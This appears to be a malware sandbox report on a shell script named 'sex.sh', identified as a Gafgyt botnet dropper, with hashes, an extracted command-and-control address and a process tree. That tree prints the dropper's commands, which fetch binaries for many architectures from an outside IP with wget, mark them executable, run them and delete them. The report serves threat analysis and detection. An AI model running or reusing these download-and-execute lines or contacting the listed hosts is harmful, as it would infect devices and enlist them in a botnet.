Analysis
-
max time kernel
13s -
max time network
15s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
04/08/2024, 13:39
Static task
static1
Behavioral task
behavioral1
Sample
sex.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
sex.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
sex.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
sex.sh
-
Size
1KB
-
MD5
4a5211253d90ad66dea73ffa8809bbd8
-
SHA1
27c91298804fd2e46e280d4259170e6a48e4280d
-
SHA256
bee780a07d3c76bc39ab97f88050339da7c3231987c32e14aca61515d7a0c276
-
SHA512
a844fe1fdd89254ff069b0bc3fa3b5812936f9560f693cd6c5658f4232f42efc9e926a3d51bd152a16283c8ab322967f6f7686f536ea395047477661b9aad0eb
Malware Config
Extracted
gafgyt
5.252.177.70:23
Signatures
-
Detected Gafgyt variant 1 IoCs
resource yara_rule behavioral3/files/fstream-1.dat family_gafgyt -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/arm61 755 arm61 -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/arm61 wget
Processes
-
/tmp/sex.sh/tmp/sex.sh1⤵PID:710
-
/usr/bin/wgetwget http://216.172.177.16/mips2⤵PID:714
-
-
/bin/chmodchmod +x mips2⤵PID:732
-
-
/tmp/mips./mips2⤵PID:734
-
-
/bin/rmrm -rf mips2⤵PID:735
-
-
/usr/bin/wgetwget http://216.172.177.16/mipsel2⤵PID:736
-
-
/bin/chmodchmod +x mipsel2⤵PID:741
-
-
/tmp/mipsel./mipsel2⤵PID:743
-
-
/bin/rmrm -rf mipsel2⤵PID:744
-
-
/usr/bin/wgetwget http://216.172.177.16/sh42⤵PID:745
-
-
/bin/chmodchmod +x sh42⤵PID:746
-
-
/tmp/sh4./sh42⤵PID:747
-
-
/bin/rmrm -rf sh42⤵PID:748
-
-
/usr/bin/wgetwget http://216.172.177.16/x862⤵PID:749
-
-
/bin/chmodchmod +x x862⤵PID:750
-
-
/tmp/x86./x862⤵PID:751
-
-
/bin/rmrm -rf x862⤵PID:752
-
-
/usr/bin/wgetwget http://216.172.177.16/arm612⤵
- Writes file to tmp directory
PID:753
-
-
/bin/chmodchmod +x arm612⤵PID:754
-
-
/tmp/arm61./arm612⤵
- Executes dropped EXE
PID:755
-
-
/bin/rmrm -rf arm612⤵PID:757
-
-
/usr/bin/wgetwget http://216.172.177.16/i6862⤵PID:758
-
-
/bin/chmodchmod +x i6862⤵PID:759
-
-
/tmp/i686./i6862⤵PID:760
-
-
/bin/rmrm -rf i6862⤵PID:761
-
-
/usr/bin/wgetwget http://216.172.177.16/ppc2⤵PID:762
-
-
/bin/chmodchmod +x ppc2⤵PID:763
-
-
/tmp/ppc./ppc2⤵PID:764
-
-
/bin/rmrm -rf ppc2⤵PID:765
-
-
/usr/bin/wgetwget http://216.172.177.16/5862⤵PID:766
-
-
/bin/chmodchmod +x 5862⤵PID:767
-
-
/tmp/586./5862⤵PID:768
-
-
/bin/rmrm -rf 5862⤵PID:769
-
-
/usr/bin/wgetwget http://216.172.177.16/m68k2⤵PID:770
-
-
/bin/chmodchmod +x m68k2⤵PID:771
-
-
/tmp/m68k./m68k2⤵PID:772
-
-
/bin/rmrm -rf m68k2⤵PID:773
-
-
/usr/bin/wgetwget http://216.172.177.16/dc2⤵PID:774
-
-
/bin/chmodchmod +x dc2⤵PID:781
-
-
/tmp/dc./dc2⤵PID:782
-
-
/bin/rmrm -rf dc2⤵PID:783
-
-
/usr/bin/wgetwget http://216.172.177.16/dss2⤵PID:785
-
-
/bin/chmodchmod +x dss2⤵PID:792
-
-
/tmp/dss./dss2⤵PID:794
-
-
/bin/rmrm -rf dss2⤵PID:795
-
-
/usr/bin/wgetwget http://216.172.177.16/co2⤵PID:796
-
-
/bin/chmodchmod +x co2⤵PID:803
-
-
/tmp/co./co2⤵PID:805
-
-
/bin/rmrm -rf co2⤵PID:807
-
-
/usr/bin/wgetwget http://216.172.177.16/scar2⤵PID:808
-
-
/bin/chmodchmod +x scar2⤵PID:815
-
-
/tmp/scar./scar2⤵PID:817
-
-
/bin/rmrm -rf scar2⤵PID:819
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
136KB
MD56820e48a7c8f9b287da8f0593b0a8f83
SHA14e5dc35c941c1d13cd9dcbcf5df2a6d5e254911f
SHA256eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811
SHA5120dd5236a98a9a05087442d3bbe0c8185712b295288be41ccb815965607d90bfef2943f2b488dd76260959895831986397907408850d719808cd1cc30dba63d1c